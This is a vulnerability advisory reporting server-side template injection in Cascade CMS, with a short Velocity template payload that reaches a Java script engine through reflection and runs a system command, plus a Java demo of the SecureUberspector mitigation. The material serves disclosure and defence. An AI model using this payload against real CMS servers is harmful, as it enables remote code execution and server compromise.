August 19, 2020

GHSL-2020-076: Server-Side Template Injection in Cascade CMS

Alvaro Munoz

Summary

A user with privileges to edit templates may execute arbitrary Java code or run arbitrary system commands with the same privileges as the account running Cascade CMS.

Product

Cascade CMS

Tested Version

Cascade CMS v8.14.cloud5 (57164371131571924e45d18fbd2725f3d8d124d4)

Details

Server-Side Template Injection (Velocity)

Cascade CMS does not use the Velocity SecureUberspector, which allows attackers who are able to modify or create templates to execute arbitrary Java code and achieve remote code execution. For example, the following template runs the system id command:

#set( $scriptEngine = $currentPage.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js') )
${scriptEngine.eval("var x=new java.lang.ProcessBuilder('id'); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())")}

In addition, Cascade CMS exposes Velocity FieldTool through the $_FieldTool variable. This tool allows accessing any public static field on any class reachable by the Velocity ClassLoader.
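The mitigation the advisory points at is the SecureUberspector: with it installed, Velocity refuses to dispatch methods on java.lang.Class, ClassLoader, Runtime, Thread and the other classes on its restricted list, so the reflective hop from $currentPage.class to forName(...) above is cut off. The example below is added here and is not Cascade CMS or GHSL code; it assumes a plain Velocity engine (1.7 or 2.x with its logging dependency on the classpath) and a hypothetical Page bean standing in for $currentPage.

```java
import java.io.StringWriter;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import org.apache.velocity.runtime.RuntimeConstants;
import org.apache.velocity.util.introspection.SecureUberspector;

public class SecureVelocityDemo {
    // Hypothetical stand-in for Cascade's $currentPage; any Java bean will do.
    public static class Page {
        public String getTitle() { return "Home"; }
    }

    // Probe template (constructed): the first reference is legitimate template
    // usage, the second attempts the reflective class lookup used in the advisory.
    static final String PROBE =
        "title=$page.title; cls=$page.class.forName('java.lang.Runtime')";

    // secure=false mirrors the vulnerable default; secure=true installs the
    // SecureUberspector, which is the configuration the advisory recommends.
    public static String render(boolean secure) {
        VelocityEngine engine = new VelocityEngine();
        if (secure) {
            engine.setProperty(RuntimeConstants.UBERSPECT_CLASSNAME,
                               SecureUberspector.class.getName());
        }
        engine.init();

        VelocityContext ctx = new VelocityContext();
        ctx.put("page", new Page());

        StringWriter out = new StringWriter();
        engine.evaluate(ctx, out, "probe", PROBE);
        return out.toString();
    }

    public static void main(String[] args) {
        // Default engine: forName(...) is dispatched and a Class object is rendered.
        System.out.println("default : " + render(false));
        // Secure engine: the method lookup on java.lang.Class is refused, Velocity
        // logs a warning and the reference is left unresolved in the output.
        System.out.println("secure  : " + render(true));
    }
}
```

Velocity's introspector.restrict.classes and introspector.restrict.packages properties extend the blocked list when an application exposes further sensitive types to templates.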

Impact

This issue may lead to Remote Code Execution.

Coordinated Disclosure Timeline

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Munoz).

Contact

You can contact the GHSL team at securitylab@github.com; please include GHSL-2020-076 in any communication regarding this issue.